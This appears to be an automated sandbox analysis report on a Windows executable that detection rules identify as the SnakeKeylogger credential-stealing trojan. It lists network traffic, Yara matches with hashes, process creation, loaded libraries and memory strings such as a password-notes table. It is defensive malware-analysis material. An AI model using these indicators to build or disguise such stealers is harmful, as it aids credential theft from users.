                Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49687
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49685
                Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49682
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
                Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
                Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49689 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49698 version: TLS 1.2

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 0.2.UFOiZapHGS.exe.4305e48.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.UFOiZapHGS.exe.4305e48.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.UFOiZapHGS.exe.4305e48.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 1.2.UFOiZapHGS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 1.2.UFOiZapHGS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 1.2.UFOiZapHGS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.UFOiZapHGS.exe.4305e48.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.UFOiZapHGS.exe.4305e48.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.UFOiZapHGS.exe.4305e48.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000001.00000002.3355826178.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.910063870.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: UFOiZapHGS.exe PID: 6596, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: UFOiZapHGS.exe PID: 6812, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_05980CA00_2_05980CA0
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_059855380_2_05985538
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_05980C900_2_05980C90
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_05983CF80_2_05983CF8
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_05982E080_2_05982E08
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_059841300_2_05984130
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_059859700_2_05985970
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_059859600_2_05985960
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_059868D00_2_059868D0
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_059868C00_2_059868C0
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_0727AF580_2_0727AF58
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_07274FC00_2_07274FC0
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_07275EE00_2_07275EE0
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_07273DB00_2_07273DB0
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_072787180_2_07278718
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_0727AF470_2_0727AF47
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_07275E7D0_2_07275E7D
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_0727B6890_2_0727B689
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_0727B6980_2_0727B698
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_07273D190_2_07273D19
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_07276D700_2_07276D70
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_0727CDAF0_2_0727CDAF
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_07276DA80_2_07276DA8
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_0727CDB00_2_0727CDB0
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_07276DB80_2_07276DB8
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_07275DFD0_2_07275DFD
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_072745C00_2_072745C0
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_072784280_2_07278428
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_0727B43F0_2_0727B43F
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_0727841B0_2_0727841B
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_0727B4400_2_0727B440
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_0727C4D10_2_0727C4D1
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_07277BF80_2_07277BF8
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_072732C10_2_072732C1
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_0727818B0_2_0727818B
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_072781980_2_07278198
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_0727C1E00_2_0727C1E0
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_0727B1EF0_2_0727B1EF
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_0727B1F00_2_0727B1F0
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_0727C1F00_2_0727C1F0
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_072780280_2_07278028
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_0727801B0_2_0727801B
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_0727C8CB0_2_0727C8CB
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_0727C8D00_2_0727C8D0
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 1_2_012971181_2_01297118
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 1_2_0129C1471_2_0129C147
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 1_2_0129A0881_2_0129A088
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 1_2_012953701_2_01295370
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 1_2_0129D2781_2_0129D278
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 1_2_0129C4681_2_0129C468
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 1_2_0129C7381_2_0129C738
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 1_2_012969A01_2_012969A0
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 1_2_0129E9881_2_0129E988
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 1_2_0129CA081_2_0129CA08
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 1_2_0129CCD81_2_0129CCD8
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 1_2_0129CFAA1_2_0129CFAA
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 1_2_0129F9611_2_0129F961
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 1_2_0129E97A1_2_0129E97A
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 1_2_012929EC1_2_012929EC
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 1_2_012939F01_2_012939F0
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 1_2_01293AA11_2_01293AA1
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 1_2_01293E091_2_01293E09
                Source: UFOiZapHGS.exe, 00000000.00000002.909252970.00000000029FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs UFOiZapHGS.exe
                Source: UFOiZapHGS.exe, 00000000.00000002.910063870.0000000003FC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs UFOiZapHGS.exe
                Source: UFOiZapHGS.exe, 00000000.00000002.910063870.0000000003FC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs UFOiZapHGS.exe
                Source: UFOiZapHGS.exe, 00000000.00000000.898021844.000000000034A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamedWRC.exe, vs UFOiZapHGS.exe
                Source: UFOiZapHGS.exe, 00000000.00000002.908295691.000000000087E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs UFOiZapHGS.exe
                Source: UFOiZapHGS.exe, 00000000.00000002.913653665.000000000AF70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs UFOiZapHGS.exe
                Source: UFOiZapHGS.exe, 00000001.00000002.3355826178.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs UFOiZapHGS.exe
                Source: UFOiZapHGS.exe, 00000001.00000002.3356113743.0000000000BC7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs UFOiZapHGS.exe
                Source: UFOiZapHGS.exeBinary or memory string: OriginalFilenamedWRC.exe, vs UFOiZapHGS.exe
                Source: UFOiZapHGS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.UFOiZapHGS.exe.4305e48.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.UFOiZapHGS.exe.4305e48.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.UFOiZapHGS.exe.4305e48.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 1.2.UFOiZapHGS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.2.UFOiZapHGS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 1.2.UFOiZapHGS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.UFOiZapHGS.exe.4305e48.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.UFOiZapHGS.exe.4305e48.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.UFOiZapHGS.exe.4305e48.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000001.00000002.3355826178.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.910063870.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: UFOiZapHGS.exe PID: 6596, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: UFOiZapHGS.exe PID: 6812, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: UFOiZapHGS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.UFOiZapHGS.exe.4305e48.4.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.UFOiZapHGS.exe.4305e48.4.raw.unpack, -K.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.UFOiZapHGS.exe.4305e48.4.raw.unpack, -K.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, tTG5u66bvje53TXubH.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, tTG5u66bvje53TXubH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, h0lKaxk7KDkCXCFAkM.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, h0lKaxk7KDkCXCFAkM.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, h0lKaxk7KDkCXCFAkM.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, tTG5u66bvje53TXubH.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, tTG5u66bvje53TXubH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, h0lKaxk7KDkCXCFAkM.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, h0lKaxk7KDkCXCFAkM.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, h0lKaxk7KDkCXCFAkM.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, tTG5u66bvje53TXubH.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, tTG5u66bvje53TXubH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, h0lKaxk7KDkCXCFAkM.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, h0lKaxk7KDkCXCFAkM.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, h0lKaxk7KDkCXCFAkM.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@3/3
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\UFOiZapHGS.exe.logJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeMutant created: NULL
                Source: UFOiZapHGS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: UFOiZapHGS.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002FE6000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002FB3000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002FA3000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002FF3000.00000004.00000800.00020000.00000000.sdmp, UFOiZapHGS.exe, 00000001.00000002.3357879942.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: UFOiZapHGS.exeVirustotal: Detection: 76%
                Source: UFOiZapHGS.exeReversingLabs: Detection: 76%
                Source: unknownProcess created: C:\Users\user\Desktop\UFOiZapHGS.exe "C:\Users\user\Desktop\UFOiZapHGS.exe"
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess created: C:\Users\user\Desktop\UFOiZapHGS.exe "C:\Users\user\Desktop\UFOiZapHGS.exe"
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess created: C:\Users\user\Desktop\UFOiZapHGS.exe "C:\Users\user\Desktop\UFOiZapHGS.exe"Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: fwpuclnt.dllJump to behavior
